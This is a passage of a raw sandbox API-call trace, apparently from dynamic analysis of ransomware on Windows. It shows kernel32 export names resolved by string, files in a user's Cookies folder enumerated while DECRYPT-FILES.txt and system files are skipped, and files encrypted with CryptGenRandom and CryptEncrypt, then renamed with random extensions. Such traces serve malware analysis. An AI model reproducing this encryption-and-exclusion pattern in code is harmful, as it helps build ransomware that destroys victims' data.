lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.975] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.975] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.975] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.975] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.976] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.976] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.976] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.976] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.976] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.976] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.976] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.976] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.976] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.976] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.976] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.976] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.976] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.976] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.976] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.977] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb") returned 128 [0181.977] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb.vNzJ") returned 133 [0181.977] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agh7ohb"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agH7oHb.vNzJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt.agh7ohb.vnzj"), dwFlags=0x0) returned 1 [0181.977] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.978] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.978] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.978] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf99e810, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf99e810, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xaba371a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", cAlternateFileName="5P5NRG~1.DIE")) returned 1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="DECRYPT-FILES.txt") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="autorun.inf") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="boot.ini") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="desktop.ini") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="ntuser.dat") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="iconcache.db") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="bootsect.bak") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="ntuser.dat.log") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="thumbs.db") returned -1 [0181.978] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr", lpString2="Bootfont.bin") returned -1 [0181.978] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr") returned 40 [0181.978] lstrcmpiW (lpString1="dIEr", lpString2="lnk") returned -1 [0181.978] lstrcmpiW (lpString1="dIEr", lpString2="exe") returned -1 [0181.978] lstrcmpiW (lpString1="dIEr", lpString2="sys") returned -1 [0181.978] lstrcmpiW (lpString1="dIEr", lpString2="dll") returned -1 [0181.978] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.978] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr") returned 40 [0181.978] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.978] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr" [0181.978] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dIEr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt.dier"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.979] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=368) returned 1 [0181.979] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.979] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.979] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.979] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.979] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.980] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.980] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.980] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.981] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.981] CloseHandle (hObject=0x288) returned 1 [0181.981] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.981] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.982] CloseHandle (hObject=0x0) returned 0 [0181.982] CloseHandle (hObject=0x284) returned 1 [0181.982] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.982] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.982] GetTickCount () returned 0x1134e30 [0181.983] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.983] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.983] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.983] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.983] lstrlenA (lpString="kernel32.dll") returned 12 [0181.983] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.983] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.983] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.983] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.983] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.983] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.984] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.984] lstrlenA (lpString="ADDATOMA") returned 8 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.984] lstrlenA (lpString="ADDATOMW") returned 8 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.984] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.984] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.984] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.984] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.984] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.984] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.984] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.984] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.984] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.984] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.984] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.984] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.984] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.984] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.984] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.984] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.985] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.985] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.985] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.985] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.985] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.985] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.985] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.985] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.985] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.985] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.985] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.985] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.985] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.985] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.985] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.985] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.985] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.985] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.986] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.986] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.986] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.986] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.986] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.986] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.986] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.986] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.986] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.986] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.986] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.986] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.986] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.986] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.986] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.986] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.986] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.986] lstrlenA (lpString="BEEP") returned 4 [0181.986] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.987] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.987] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.987] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.987] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.987] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.987] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.987] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.987] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.987] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.987] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: 